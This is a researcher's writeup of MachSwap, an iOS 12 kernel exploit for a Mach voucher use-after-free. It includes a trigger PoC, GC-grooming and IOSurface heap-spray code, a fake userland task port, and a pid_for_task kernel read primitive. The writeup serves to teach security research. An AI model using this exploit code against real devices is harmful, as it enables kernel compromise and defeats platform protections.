<h1 id="machswap-an-ios-12-kernel-exploit">MachSwap: an iOS 12 Kernel Exploit</h1>
<p>Back at the end of January <a href="https://twitter.com/ibsparkes/status/1090337769300340742">I demo’d an early iOS 12 prototype jailbreak</a>, which included a homebrewed kernel exploit, root FS remount, and nonce setter. I achieved this in a little under two days with help from my good friends @S1guza, @littlelailo, and @stek29, making it one of the first iOS 12 prototype jailbreaks, before any public kernel exploits had been released (subtle flex). About a month later I tidied up the source code and released the initial non-SMAP exploit under the name <a href="https://twitter.com/iBSparkes/status/1101213856087592960">machswap</a> (I later released an SMAP-compatible version, machswap2, which can also be found on my GitHub). I wanted to create a writeup detailing the bug and how the exploit works, in order to inspire and help others who are interested in iOS security research.</p>
<h2 id="looking-at-a-modern-ios-exploit">Looking at a modern iOS exploit</h2>
<p>On the 23rd of January 2019, security researcher <a href="https://twitter.com/S0rryMybad">@S0rryMybad</a> released a <a href="https://twitter.com/S0rryMybad/status/1087892194847907840">proof of concept exploit</a> for a kernel bug affecting iOS 12.1.2 and below. A little over five and a half hours later he followed it up with <a href="http://blogs.360.cn/post/IPC%20Voucher%20UaF%20Remote%20Jailbreak%20Stage%202.html">a Chinese blog post</a> describing the bug and possible exploitation techniques, and later an <a href="http://blogs.360.cn/post/IPC%20Voucher%20UaF%20Remote%20Jailbreak%20Stage%202%20(EN).html">English version</a>.</p>
<p>The bug is a use-after-free vulnerability which can be triggered from a sandboxed process on iOS, such as an app. It stems from a reference counting issue caused by a flawed implementation of a function within the kernel.</p>
<p>Before explaining the details of the bug, it’s important to understand a little about MIG and the Mach subsystem in XNU (XNU is the kernel used on iOS, macOS, and other Apple platforms).</p>
<h3 id="0x01-mach-mig-and-uafs">0x01 Mach, MIG, and UAFs</h3>
<p>Mach is an IPC or “Inter-Process Communication” layer, which allows processes on a system to talk to one another. This includes the kernel, as well as other system services and daemons which are responsible for handling specific tasks (for example, the userland daemon bluetoothd implements a Mach server, which can be accessed to set up and manage bluetooth connections). It’s a postbox-like system which involves sending letters (Mach messages) between postboxes (Mach ports). Different postboxes (Mach ports) have different “rights”, for example you may only be able to send mail from some postboxes (a send right) whilst only being able to receive mail in others (a receive right). All postboxes have a specific address, in XNU this is known as a “handle”.</p>
<p>While it can be done, writing raw Mach code is a very tedious and time consuming process, and it’s easy to make mistakes which can potentially cause issues or create vulnerabilities within Mach server processes.</p>
<p>Therefore, Apple created a tool called MIG (“Mach Interface Generator”). It allows far quicker development of Mach interfaces, and is used all over iOS to design and handle Mach communication between both services and the kernel. When using MIG to generate Mach code, you can write definitions for functions you want to be able to access over the Mach API. “jailbreakd”, used in the Meridian and Electra jailbreaks, is one such example of a Mach server using MIG-generated code, and you can see the template used to generate the “jbd_call” function which jailbreakd implements here:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// mig -sheader jailbreak_daemonServer.h -header jailbreak_daemonUser.h mig.defs
subsystem jailbreak_daemon 500;
userprefix jbd_;
serverprefix jbd_;
WaitTime 2500;
#include <mach/std_types.defs>
#include <mach/mach_types.defs>
routine call(server_port : mach_port_t;
          in command     : uint8_t;
          in pid         : uint32_t);
</code></pre></div></div>
<p>This will expose a “jbd_call” function implemented within jailbreakd, which can then be accessed from any clients that wish to communicate with it. Here, three arguments are provided to the server: the Mach port of the request, a byte which represents the command, and an unsigned 32-bit integer which represents the PID (Process ID) of the target process for jailbreakd to operate on.</p>
<p>MIG simply allows you to define this function, and will handle all of the raw Mach heavy lifting. This includes managing messages, reply ports, timeouts, and the lifetime or refcounts (reference counts) of objects. A “refcount” is simply a counter of how many places the object is being accessed or used from. Once an object reaches a reference count of zero, the object can be released, as there is no longer any code on the system using the object.</p>
<p>But is this always the case? A bug which allows an attacker to decrement the reference count more than intended (often referred to as “dropping a ref”) means the object can be released while it’s still in use by code, leading to a use-after-free (UAF) condition. “Releasing” here means the memory which holds the object is handed back to the allocator (the mechanism which manages memory allocations; in userland this is “malloc”, in the kernel this is often “kalloc”) – this is also known as “freeing” the memory (hence the term use-after-free). The memory can then be re-allocated and used by other code for other purposes. However, if a piece of memory used by function “A” is released and then re-used by function “B”, function “B” can interfere with the workings of function “A”. It’s important to note that the UAF’d object doesn’t have to be continuously used by a single function; what matters is that the code using the released object still views it as valid and thinks it has exclusive use of it, even though the allocator has released that memory and may have allocated it elsewhere.</p>
<p><em>From a more abstract standpoint, many bugs are based on the idea of mismatching states between two or more pieces of code or mechanisms. For example, with an integer overflow, you might want to mismatch the actual size of an allocation with how large the code thinks the allocation is. If you consider the kernel as an incredibly large state machine, we’re effectively placing it into an unintended state where some code is using an allocation of memory whilst some other code (the allocator) is allowing that same memory to be re-used by other attacker-influenced code. It’s like walking up to a parking meter and pressing ↑↑↓↓←→←→BA in order to put the machine in a weird state and get a free parking ticket.</em></p>
<h3 id="0x02-the-vuln">0x02 The Vuln</h3>
<p>This leads us on to the vulnerability used in this kernel exploit. Let’s take a look at the following function:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>task_swap_mach_voucher(
    task_t          task,
    ipc_voucher_t   new_voucher,
    ipc_voucher_t   *in_out_old_voucher)
{
    if (TASK_NULL == task)
        return KERN_INVALID_TASK;

    *in_out_old_voucher = new_voucher;
    return KERN_SUCCESS;
}
</code></pre></div></div>
<p>Looks fairly simple, right? It simply swaps a voucher in a pointer with a new voucher. This function can be accessed from userland (ie. an iOS app) via the Mach API, and the call between kernel and userland is handled by MIG. However, let’s take a look at that MIG code:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>task = convert_port_to_task(In0P->Head.msgh_request_port);

/* increments by one */
new_voucher = convert_port_to_voucher(In0P->new_voucher.name);

/* increments by one */
old_voucher = convert_port_to_voucher(In0P->old_voucher.name);

RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);

ipc_voucher_release(new_voucher); /* decrements by one */
task_deallocate(task);

if (RetCode != KERN_SUCCESS) {
    MIG_RETURN_ERROR(OutP, RetCode);
}

if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
    ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);

if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
    ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);

/* decrements by one */
OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);
</code></pre></div></div>
<p><em>To generate this code, you can download the corresponding .defs file for the function from the XNU sources, and run the command <code class="highlighter-rouge">mig -DKERNEL -DKERNEL_SERVER mig.defs</code></em></p>
<p>At first glance, this code looks fine. Each voucher object has its refcount incremented by one, and then decremented by one. However, because the MIG code has no understanding of what the kernel function (<code class="highlighter-rouge">task_swap_mach_voucher</code>) itself is doing, and vice-versa, an issue arises. After <code class="highlighter-rouge">task_swap_mach_voucher</code> is called, <code class="highlighter-rouge">old_voucher</code> and <code class="highlighter-rouge">new_voucher</code> will be equal (remember, <code class="highlighter-rouge">task_swap_mach_voucher</code> assigns <code class="highlighter-rouge">new_voucher</code> into <code class="highlighter-rouge">old_voucher</code>). Therefore, the refcount on <code class="highlighter-rouge">new_voucher</code> will be incremented once, but then decremented twice: once by <code class="highlighter-rouge">ipc_voucher_release</code>, <em>and</em> once by <code class="highlighter-rouge">convert_voucher_to_port</code> (again, <code class="highlighter-rouge">old_voucher</code> is now equal to <code class="highlighter-rouge">new_voucher</code>). Meanwhile, the refcount on the original <code class="highlighter-rouge">old_voucher</code> is never decremented at all. This leads us to the following proof of concept (PoC):</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mach_voucher_attr_recipe_data_t atm_data =
{
    .key = MACH_VOUCHER_ATTR_KEY_ATM,
    .command = 510
};

mach_port_t p1;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);

mach_port_t p2;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p2);

mach_port_t p3;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p3);

/*
    We assign p1 (our target voucher) onto our thread so that it can be
    retrieved again later via thread_get_mach_voucher.
    This will increment a ref on the voucher -- the current refcount is 2.
*/
ret = thread_set_mach_voucher(mach_thread_self(), p1);

ret = task_swap_mach_voucher(mach_task_self(), p1, &p2); // Trigger the bug once, this drops a ref from 2 to 1
ret = task_swap_mach_voucher(mach_task_self(), p1, &p3); // Second trigger, this frees the voucher (refcnt=0)

/* Ask for a handle on the dangling voucher, 9 times out of 10 this will cause a panic due to the bad refcnt etc */
mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;
ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);
</code></pre></div></div>
<p>Here we trigger the bug twice via the <code class="highlighter-rouge">task_swap_mach_voucher</code> call to drop two refs on the target voucher. This then leaves us with a pointer on our thread to a free’d voucher in kernel memory.</p>
<h3 id="0x03-beginning-our-exploitation">0x03 Beginning our Exploitation</h3>
<p>Once the voucher has been free’d we can then replace this with attacker-controlled data via a technique called “heap spraying”. The idea is to fill or “spray” the kernel heap (a place in a program in which allocations managed by the allocator are created and destroyed) to overwrite the now-free’d voucher with our own data. If this is done successfully, we would then have the voucher pointer in our thread pointing to our arbitrary voucher struct, and we could use the <code class="highlighter-rouge">thread_get_mach_voucher</code> function to get a userland handle on that voucher, which can then be passed to Mach API’s to gain new attack primitives.</p>
<p>The <code class="highlighter-rouge">ipc_voucher</code> struct is defined as follows:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct ipc_voucher {
    iv_index_t      iv_hash;          /* checksum hash */
    iv_index_t      iv_sum;           /* checksum of values */
    os_refcnt_t     iv_refs;          /* reference count */
    iv_index_t      iv_table_size;    /* size of the voucher table */
    iv_index_t      iv_inline_table[IV_ENTRIES_INLINE];
    iv_entry_t      iv_table;         /* table of voucher attr entries */
    ipc_port_t      iv_port;          /* port representing the voucher */
    queue_chain_t   iv_hash_link;     /* link on hash chain */
};
</code></pre></div></div>
<p>We can see the <code class="highlighter-rouge">iv_refs</code> field which contains the reference count which we dropped, and importantly, a pointer to an <code class="highlighter-rouge">ipc_port_t</code> in <code class="highlighter-rouge">iv_port</code>. This <code class="highlighter-rouge">ipc_port_t</code> struct is the kernel representation of a generic Mach port. In this case, the <code class="highlighter-rouge">ipc_voucher</code> holds its <code class="highlighter-rouge">ipc_port_t</code> as a field whilst also implementing some attributes of its own (for example, <code class="highlighter-rouge">iv_table</code> and <code class="highlighter-rouge">iv_inline_table</code>).</p>
<p>One important thing to note about the voucher port is that it doesn’t have a receive right. In Mach, ports can have send and receive rights. If the port has a send right you can send messages on that port, and if the port has a receive right you can receive messages on that port. Since we have no receive right here, this means the exploit strays slightly from the de-facto exploitation (ie. v0rtex). However, the same results can still be achieved by using slightly different primitives – this will come into play later.</p>
<p>When we perform our heap spray we want to spray these <code class="highlighter-rouge">ipc_voucher</code> structs onto the kernel heap and replace the free’d voucher struct with an arbitrary one. The main goal is to gain control of the <code class="highlighter-rouge">iv_port</code> field, and point that into an attacker controlled <code class="highlighter-rouge">ipc_port</code>. This is the basis of how many Mach API-based exploitation techniques work: get a userland handle onto an attacker-controlled <code class="highlighter-rouge">ipc_port</code> which is “theoretically” owned and managed by the kernel.</p>
<p>This is where the “non-SMAP” element of this exploit comes into play. Typically, on SMAP devices (A10 and newer), the kernel is unable to access memory in userland. SMAP (Supervisor Mode Access Prevention) is implemented to stop attackers providing userland allocations when attacking the kernel which can directly be modified in userland without any special tricks. However, on non-SMAP devices (<=A9), we are still able to abuse this technique when performing exploitation (SMAP has to be implemented in hardware, and therefore can’t be backported to older firmwares via updates).</p>
<p>In this case, we can spray an <code class="highlighter-rouge">ipc_voucher</code> struct, where the <code class="highlighter-rouge">iv_port</code> field contains a pointer to an <code class="highlighter-rouge">ipc_port</code> allocated in userland. This means the kernel will use our <code class="highlighter-rouge">ipc_port</code> as if it had been created and allocated in kernelspace, when in fact it has been allocated in userland and can be manipulated and updated by us directly. Here is the code in the exploit which sets up this voucher:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kport_t *fakeport = malloc(0x4000);
mlock((void *)fakeport, 0x4000);
bzero((void *)fakeport, 0x4000);

fakeport->ip_bits = IO_BITS_ACTIVE | IKOT_TASK;
fakeport->ip_references = 100;
fakeport->ip_lock.type = 0x11;
fakeport->ip_messages.port.receiver_name = 1;
fakeport->ip_messages.port.msgcount = 0;
fakeport->ip_messages.port.qlimit = MACH_PORT_QLIMIT_LARGE;
fakeport->ip_messages.port.waitq.flags = mach_port_waitq_flags();
fakeport->ip_srights = 99;

LOG("fakeport: 0x%llx", (uint64_t)fakeport);

/* the fake voucher to be sprayed */
fake_ipc_voucher_t fake_voucher = (fake_ipc_voucher_t)
{
    .iv_hash = 0x11111111,
    .iv_sum = 0x22222222,
    .iv_refs = 100,
    .iv_port = (uint64_t)fakeport
};
</code></pre></div></div>
<p>You can see we create a fake <code class="highlighter-rouge">ipc_voucher</code> which contains 100 refs (this is so the object will never prematurely be destroyed), and the <code class="highlighter-rouge">iv_port</code> field contains a pointer directly to our userland <code class="highlighter-rouge">fakeport</code> object.</p>
<p>Now we need to spray this object into kernel memory. However, there is a slight problem, related to the “kalloc” allocator and “kalloc zones”.</p>
<h3 id="0x04-borachio-and-the-climate-control-team-abusing-gc">0x04 Borachio and the Climate Control Team (Abusing GC)</h3>
<p>Kalloc, the XNU allocator which is used to allocate our ipc_voucher struct which we have UAF’d, uses a series of “zones” to allocate objects into. These are sections of heap memory which only contain a specific size or type of object. For example, the kalloc.32 zone contains objects which are <=32 bytes in size (however >16 bytes, as this is the next smallest zone). You can take a look at some of these zones by using the “zprint” command on an OSX or iOS system:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo zprint | awk 'NR<=3 || /kalloc|ipc.ports/'
               elem       cur       max       cur       max       cur   alloc  alloc
zone name      size      size      size     #elts     #elts     inuse    size  count
--------------------------------------------------------------------------------------
kalloc.16        16    12592K    13301K    805888    851264    802478      4K    256 C
kalloc.32        32     3652K     3941K    116864    126113    113244      4K    128 C
kalloc.48        48     5952K     8867K    126976    189169    121315      4K     85 C
kalloc.64        64     9212K    13301K    147392    212816    145701      4K     64 C
kalloc.80        80     2988K     3941K     38246     50445     37847      4K     51 C
kalloc.96        96     1496K     1556K     15957     16607     15011      8K     85 C
kalloc.128      128     5400K     5911K     43200     47292     41427      4K     32 C
kalloc.160      160     1432K     1556K      9164      9964      7958      8K     51 C
kalloc.192      192      876K     1037K      4672      5535      4520     12K     64 C
kalloc.224      224     9488K    10509K     43373     48043     36239     16K     73 C
kalloc.256      256     2912K     3941K     11648     15764     10799      4K     16 C
kalloc.288      288     3260K     3892K     11591     13839     10416     20K     71 C
kalloc.368      368     3488K     4151K      9705     11553      8810     32K     89 C
kalloc.400      400     2640K     3892K      6758      9964      5665     20K     51 C
kalloc.512      512     3636K     3941K      7272      7882      6848      4K      8 C
kalloc.576      576      212K      345K       376       615       290      4K      7 C
kalloc.768      768     2676K     3503K      3568      4670      3009     12K     16 C
kalloc.1024    1024     3716K     5911K      3716      5911      3503      4K      4 C
kalloc.1152    1152      320K      461K       284       410       200      8K      7 C
kalloc.1280    1280     1040K     1153K       832       922       723     20K     16 C
kalloc.1664    1664      700K      717K       430       441       399     28K     17 C
kalloc.2048    2048      932K     1167K       466       583       456      4K      2 C
kalloc.4096    4096     4816K    13301K      1204      3325      1140      4K      1 C
kalloc.6144    6144    16704K    26602K      2784      4433      2628     12K      2 C
kalloc.8192    8192     1536K     5254K       192       656       187      8K      1 C
ipc.ports       168     5580K    18660K     34011    113737     33156     12K     73 C
</code></pre></div></div>
<p><em>The appended <code class="highlighter-rouge">awk</code> command will print the first 3 lines of the zprint output (the table header), as well as any lines which contain ‘kalloc’ or ‘ipc.ports’</em></p>
<p><em>Note: the output will vary slightly between an iOS and OSX system. For example, there are some differences in the kalloc zones. This output was dumped from an OSX system.</em></p>
<p>In this list we can see all of the kalloc zones, as well as a special zone called ‘ipc.ports’, which ipc ports are allocated into – including our ipc_voucher. There are no primitives which allow spraying arbitrary data into the ipc.ports zone, so in order to spray over the page containing our free’d voucher we first need to release that page back to the allocator, and then have it re-allocated into a kalloc zone (which <em>can</em> be sprayed into). This can be done via the GC (Garbage Collection) mechanism: triggering GC will release any unused pages back to the allocator.</p>
<p>On iOS 10 and older, this mechanism could be triggered via a Mach call to the kernel. However, in iOS 11 this functionality was removed, so attackers must now trigger it indirectly. In Siguza’s <a href="https://siguza.github.io/v0rtex/">v0rtex writeup</a>, he described one method of doing so:</p>
<blockquote>
<p>[…] you should still be able to trigger a garbage collection by iterating over all zones, allocating and subsequently freeing something like 100MB in each, and measuring how long it takes to do so - garbage collection should be a significant spike</p>
</blockquote>
<p>Hence the following function. Here we allocate a message body which will land in the kalloc.16384 zone, and send it (via the <code class="highlighter-rouge">send_kalloc_message</code> function) up to 256 times, timing each send. If sending one of these messages takes longer than 1,000,000 nanoseconds (1 millisecond), we can assume GC has been triggered.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void trigger_gc_please()
{
    [...]

    uint32_t body_size = message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
    uint8_t *body = malloc(body_size);
    memset(body, 0x41, body_size);

    for (int i = 0; i < gc_ports_cnt; i++)
    {
        uint64_t t0, t1;

        t0 = mach_absolute_time();
        gc_ports[i] = send_kalloc_message(body, body_size);
        t1 = mach_absolute_time();

        if (t1 - t0 > 1000000)
        {
            LOG("got gc at %d -- breaking", i);
            gc_ports_max = i;
            break;
        }
    }

    [...]

    sched_yield();
    sleep(1);
}
</code></pre></div></div>
<p>Whilst machswap is a particularly fast exploit overall, this is the slowest part, and also the most critical: if triggering GC fails, the page will not be released, our heap spray will fail, and hence the entire exploit will fail. Since GC works asynchronously (at the same time as other code), we also need to wait some time to ensure GC has completed; hence the inclusion of the <code class="highlighter-rouge">sched_yield</code> and <code class="highlighter-rouge">sleep</code> calls in the epilogue of this function.</p>
<p>An important factor of GC that must be taken into consideration is that <em>all</em> objects on a given page must be released before the page itself can be released. This means there cannot be a single outside allocation left on the same page as our target UAF voucher. To combat this, 0x2000 ports are allocated before our target “p1”, and a further 0x1000 after. See the following code:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* allocate 0x2000 vouchers to alloc some new fresh pages */
for (int i = 0; i < 0x2000; i++)
{
    ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &before[i]);
}

/* alloc our target uaf voucher */
mach_port_t p1;
ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &p1);

/* allocate 0x1000 more vouchers */
for (int i = 0; i < 0x1000; i++)
{
    ret = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&atm_data, sizeof(atm_data), &after[i]);
}

/*
    theoretically, we should now have 3 blocks of memory (roughly) as so:

    |--------------------|-------------|------------------|
    |      ipc ports     | target port |  more ipc ports  |
    |--------------------|-------------|------------------|
                         ^             ^
                  page with only our controlled ports

    hopefully our target port is now allocated on a page which contains only our
    controlled ports. this means when we release all of our ports *all* allocations
    on the given page will be released, and when we trigger GC the page will be released
    back from the ipc_ports zone to be re-used by kalloc

    this allows us to spray our fake vouchers via IOSurface in other kalloc zones
    (ie. kalloc.1024), and the dangling pointer of the voucher will then overlap with one
    of our allocations
*/
</code></pre></div></div>
<p>After triggering the UAF bug and releasing the target port, we can then release all of our controlled ports and continue by attempting to trigger GC.</p>
<h3 id="0x05-a-heap-spray-for-your-sprog">0x05 A Heap Spray for your Sprog</h3>
<p>Assuming all has gone to plan, by this point GC will have been triggered, and our page released back to the allocation pool. We can then continue with our heap spray, sending our fake voucher into the kernel to replace the free’d voucher. For this we can make use of an IOKit UserClient implemented in the “IOSurface” kext (kernel extension). IOKit is a kernel interface for handling drivers and extensions, and a user client is an object which allows a user to issue commands to a kernel extension. IOSurface is a kext designed for handling and performing calculations on graphical buffers, however it also provides a great heap spraying primitive for us, for two reasons. Firstly, IOSurface (specifically the “set value” method) allows us to provide an encoded plist (property list) containing objects such as arrays (OSArray), dictionaries (OSDictionary), strings (OSString), etc. Within these objects we can place completely arbitrary data (including nested types, ie. a dictionary inside of an array). Secondly, the IOSurface userclient is accessible from the app sandbox, as there are no entitlement or permission checks, nor blocks from the sandbox.</p>
<p>To spray our data, we set up a single Surface, and then use an array containing a single dictionary, where each entry contains one of the OSStrings we want to spray. An OSString can be any size, however we want to fill entire pages of memory with our data. On 4k devices the pagesize is 0x1000 (4096) bytes, and on 16k devices it is 0x4000 (16,384). Due to the “string” part of OSString, our data must be terminated with a NULL byte, so we need to account for this in our size calculations. The code below sets up the data which will be set onto the Surface (and hence sprayed into kernel memory), with the bcopy loop filling each of our OSStrings with our fake ipc_vouchers.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define FILL_MEMSIZE 0x4000000
int spray_qty = FILL_MEMSIZE / pagesize; // # of pages to spray
int spray_size = (5 * sizeof(uint32_t)) + (spray_qty * ((4 * sizeof(uint32_t)) + pagesize));
uint32_t *spray_data = malloc(spray_size); // header + (spray_qty * (item_header + pgsize))
bzero((void *)spray_data, spray_size);

uint32_t *spray_cur = spray_data;

/*
    +-> Surface
        +-> Array
            +-> Dictionary
                +-> OSString
                +-> OSString
                +-> OSString
                etc (spray_qty times)...
*/

*(spray_cur++) = surface->id;
*(spray_cur++) = 0x0;
*(spray_cur++) = kOSSerializeMagic;
*(spray_cur++) = kOSSerializeEndCollection | kOSSerializeArray | 1;
*(spray_cur++) = kOSSerializeEndCollection | kOSSerializeDictionary | spray_qty;

for (int i = 0; i < spray_qty; i++)
{
    *(spray_cur++) = kOSSerializeSymbol | 5;
    *(spray_cur++) = transpose(i);
    *(spray_cur++) = 0x0;
    *(spray_cur++) = (i + 1 >= spray_qty ? kOSSerializeEndCollection : 0) | kOSSerializeString | (pagesize - 1);

    for (uintptr_t ptr = (uintptr_t)spray_cur, end = ptr + pagesize;
         ptr + sizeof(fake_ipc_voucher_t) <= end;
         ptr += sizeof(fake_ipc_voucher_t))
    {
        bcopy((const void *)&fake_voucher, (void *)ptr, sizeof(fake_ipc_voucher_t));
    }

    spray_cur += (pagesize / sizeof(uint32_t));
}
</code></pre></div></div>
<p>We can then make a call to the userclient to set the provided data onto the Surface:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>uint32_t dummy = 0;
size = sizeof(dummy);
ret = IOConnectCallStructMethod(client, IOSURFACE_SET_VALUE, spray_data, spray_size, &dummy, &size);
if (ret != KERN_SUCCESS)
{
    LOG("setValue(prep): %s", mach_error_string(ret));
    goto out;
}
</code></pre></div></div>
<p>If this has worked correctly, our free’d ipc_voucher will now have been replaced with the fake voucher which we copied into kernel memory via our heap spray. This means the voucher pointer stashed on our thread will now point to our fake <code class="highlighter-rouge">ipc_voucher</code>, which points to our fake <code class="highlighter-rouge">ipc_port</code>, which is allocated in userland as <code class="highlighter-rouge">fakeport</code>. We now attempt to get a handle onto this voucher/port, via the <code class="highlighter-rouge">thread_get_mach_voucher</code> call:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mach_port_t real_port_to_fake_voucher = MACH_PORT_NULL;

/* fingers crossed we get a userland handle onto our 'fakeport' object */
ret = thread_get_mach_voucher(mach_thread_self(), 0, &real_port_to_fake_voucher);

LOG("port: %x", real_port_to_fake_voucher);

/* things are looking good; should be 100% success rate from here */
LOG("WE REALLY POSTED UP ON THIS BLOCK");

mach_port_t the_one = real_port_to_fake_voucher;
</code></pre></div></div>
<p>From here, things are looking good. Assuming our port is in fact valid, we should have a 100% success rate from this point – the dangerous parts are now over.</p>
<h3 id="0x06-eavesdropping-kernel-memory-building-a-read-primitive">0x06 Eavesdropping Kernel Memory: Building a Read Primitive</h3>
<p>We can now start to build our first read primitive which we can use to read important pointers in the kernel’s memory – these are later used in setting up our fake kernel task struct.</p>
<p>Typically, I would recommend setting up a read primitive via the <code class="highlighter-rouge">mach_port_get_attributes</code> Mach call, as demonstrated in the v0rtex exploit, since it implements proper locking on the port. However, due to the aforementioned lack of a receive right, this is not possible here. Instead, we will use an older but more common technique in Mach-based exploitation: the <code class="highlighter-rouge">pid_for_task</code> primitive. The Mach API implements a function called “pid_for_task”, which returns the PID of the process whose task port you provide. Here is the (heavily stripped) kernel code:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pid_for_task(
    struct pid_for_task_args *args)
{
    mach_port_name_t t = args->t;
    user_addr_t pid_addr = args->pid;

    [...]

    t1 = port_name_to_task_inspect(t);

    [...]

    p = get_bsdtask_info(t1); /* Get the bsd_info entry from the task */
    if (p) {
        pid = proc_pid(p); /* Returns p->p_pid */
        err = KERN_SUCCESS;
    } [...]

    (void) copyout((char *) &pid, pid_addr, sizeof(int));
    return(err);
}
</code></pre></div></div>
<p>You can see <code class="highlighter-rouge">get_bsdtask_info</code> is called on the task port we provide, and then the resulting pid from <code class="highlighter-rouge">proc_pid</code> is copied back to userland. The important thing here is that no checks are performed on the validity of the provided task port nor the proc which is returned from <code class="highlighter-rouge">get_bsdtask_info</code> (even so, such checks would be futile against this primitive). Let’s look at <code class="highlighter-rouge">get_bsdtask_info</code> and <code class="highlighter-rouge">proc_pid</code>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void *get_bsdtask_info(task_t t)
{
    /* ldr x0, [x0, #0x358]; ret */
    return(t->bsd_info);
}

int
proc_pid(proc_t p)
{
    if (p != NULL)
        /* ldr w0, [x0, #0x60]; ret */
        return (p->p_pid);
    return -1;
}
</code></pre></div></div>
<p>In essence, via this call, we can retrieve the value of <code class="highlighter-rouge">task->bsd_info->p_pid</code>. Since we have control over the <code class="highlighter-rouge">task</code> struct (the task pointer is a field within our fakeport), we have full control of the address which <code class="highlighter-rouge">bsd_info</code> points to. Therefore, by manipulating the <code class="highlighter-rouge">bsd_info</code> pointer, we can get a 32-bit read (as p_pid is a 32-bit int, and the value is loaded into the ‘w’ register) of any kernel address we require. If we need to read a 64-bit value, we can perform two adjacent 32-bit reads and combine the halves to reconstruct the full value.</p>
<p>We first allocate a fake task object which resides in the <code class="highlighter-rouge">ip_kobject</code> field of our fakeport. We also set the <code class="highlighter-rouge">ip_bits</code> field of our fakeport to <code class="highlighter-rouge">IO_BITS_ACTIVE | IKOT_TASK</code> – this marks our ipc_port as a port which represents a task, allowing us to use calls such as <code class="highlighter-rouge">pid_for_task</code> on it.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ktask_t *fake_task = (ktask_t *)malloc(0x600); // struct task is ~0x568 bytes; round up to 0x600
bzero((void *)fake_task, 0x600);
fake_task->ref_count = 0xff;
uint64_t *read_addr_ptr = (uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_bsd_info);
fakeport->ip_kobject = (uint64_t)fake_task;
</code></pre></div></div>
<p>The <code class="highlighter-rouge">read_addr_ptr</code> points to our <code class="highlighter-rouge">bsd_info</code> pointer, which we can overwrite with arbitrary kernel addresses. We then implement our 32-bit read primitive as follows:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define rk32(addr, value)\
    *read_addr_ptr = addr - offsets->struct_offsets.proc_pid;\
    value = 0x0;\
    ret = pid_for_task(the_one, (int *)&value);
</code></pre></div></div>
<p>Note the <code class="highlighter-rouge">addr - offsets->struct_offsets.proc_pid</code>. When the <code class="highlighter-rouge">p_pid</code> field is accessed, the kernel adds the offset of <code class="highlighter-rouge">proc_pid</code> to the <code class="highlighter-rouge">bsd_info</code> pointer before performing the read. We therefore subtract this value up front so that the read lands exactly on the address we want.</p>
<p>As previously noted, we can combine two adjacent 32-bit values for a full 64-bit read:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define rk64(addr, value)\
    rk32(addr + 0x4, read64_tmp); /* Read the higher 32 bits */ \
    rk32(addr, value); /* Read the lower 32 bits */ \
    value = value | ((uint64_t)read64_tmp << 32) /* Shift the higher 32 bits left and OR against the lower */
</code></pre></div></div>
<p>We now have a working read primitive based on our fakeport and newly-allocated fake task struct.</p>
<h3 id="0x07-defeating-kaslr">0x07 Defeating kASLR</h3>
<p>ASLR (Address Space Layout Randomization) is a mitigation which makes exploitation harder by shifting all the static data within a program’s address space by a randomly chosen value. In the kernel, this shifts all of the static regions (__TEXT, __DATA.__const, etc) from a known base address to a higher, random memory location. It’s important to derive this value (known as the kernel “slide”), as it is commonly used by jailbreaks to read and write data at static offsets, and to call functions in kernel <code class="highlighter-rouge">__TEXT</code>.</p>
<p>The first thought that may come to mind when learning about kASLR is: can it simply be brute forced? In the typical sense of trying to read from every possible base address until you get some data, the answer is no. The kernel slide can vary by a huge amount, and when attempting to read from every address you would likely hit an unmapped region; if the kernel reads from an unmapped region, a fault is triggered, ending in a panic. This would hugely decrease the success rate of the exploit, as you would be relying on a near-perfect guess of where the kernel image is located in memory. Here is the code used to derive the kernel base address, courtesy of the <a href="https://www.theiphonewiki.com/wiki/Kernel_ASLR">iPhoneWiki</a>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> base = 0x01000000 + (slide_byte * 0x00200000)
</code></pre></div></div>
